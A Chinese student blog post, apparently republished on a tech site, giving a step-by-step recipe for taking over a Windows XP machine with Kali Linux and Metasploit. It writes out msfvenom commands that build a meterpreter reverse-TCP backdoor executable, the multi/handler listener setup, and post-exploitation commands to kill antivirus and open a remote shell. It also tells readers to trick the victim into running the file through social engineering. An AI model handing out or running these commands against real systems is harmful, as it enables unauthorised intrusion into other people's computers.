admin 管理员组文章数量: 887018
这学期老师布置了一个不算大的大作业,让我们组队做一个攻击。思来想去,作为一个小白,也只能做一些比较简单的攻击,于是就从网上找了用metasploit黑入Windows xp的方法。这里我先把需要的命令列出来,然后详细地解释每条命令的具体含义,最后再介绍一些常用的操作。
1.root@kali:/# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.189.128LPORT=4444 --format=exe -o /root/program.exe
2.root@kali:/# ls -la /root/program.exe
3.root@kali:# msfconsole
4.msf5 > use exploit/multi/handler
5.msf5 exploit(handler) > set payload windows/meterpreter/reverse_tcp
6.msf5 exploit(handler) > set lhost 192.168.189.128
7.msf5 exploit(handler) > set lport 4444
8.msf5 exploit(handler) > exploit
目标系统上运行program.exe
现在就成功入侵了对方的系统。下面就来讲解一下每条指令的用法和含义。
1.root@kali:/# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.189.128LPORT=4444 --format=exe -o /root/program.exe
这条命令创建payload程序。payload是啥呢?payload被称为“载荷”,也就是说能实施恶意行为的部分,就先叫它恶意软件吧。msfvenom是一个根据不同平台产生相应的后门的软件,kali上自带的有。后面的参数:p对应payload,其他的大致都能看明白。需要注意的是,LHOST是自己的主机ip,端口的话可以根据你自己的想法设置,不想麻烦的用4444就行,反正可以建立很多端口。 好啦,这条命令过后,就生成了program.exe作为载荷,放在了root目录下面。
2.root@kali:/# ls -la /root/program.exe
使用这条命令可以查看payload的位置。
3.root@kali:# msfconsole
打开了metasploit,就是那个会用一些字符组成一个很帅的图案的牛逼软件啦。metasploit在网上的定义,唯一有用的就一句:本身附带数百个已知软件漏洞的专业级漏洞攻击工具。所以可以用这个软件做各种骚操作。
4.msf5 > use exploit/multi/handler
按照专业的定义:Metasploit has exploit/multi/handler, which is a special exploit module that isn't really an exploit, for exactly this purpose. All it does is allow you to configure a payload and run the handler for it.大致就是说这个工具会方便你配置payload。
5.msf5 exploit(handler) > set payload windows/meterpreter/reverse_tcp
这里应该就是对payload进行设置吧,我也不太懂,照做吧。
6.msf5 exploit(handler) > set lhost 192.168.189.128
设置攻击机的ip,就是自己kali的ip。
7.msf5 exploit(handler) > set lport 4444
设置端口,上面说过的。
8.msf5 exploit(handler) > exploit
开始攻击。这条命令之后,需要victim打开program.exe,运行payload,这样才能实施攻击。至于如何让victim打开program.exe,这就看你自己了,动用社会工程学等各种方法都行。
在对方没有打开program.exe时,我的界面是这样的,等待中。
当对方打开program.exe后,就变成了下面这样。
这就进入了meterpreter,然后就可以实施各种高端操作了。
1.sysinfo 可以查看victim机器的基本情况。比如系统版本、架构之类的。
2.idletime 查看victim主机的运行时间。
3.run post/windows/manage/killav 关闭victim的杀毒软件
4. shell 进入对方的cmd中
更多操作可以参考这篇https://blog.csdn/qq_41880069/article/details/82908293#3meterpreter_185
版权声明:本文标题:使用kali黑掉Windows xp 内容由网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:http://www.freenas.com.cn/jishu/1727339184h1104498.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论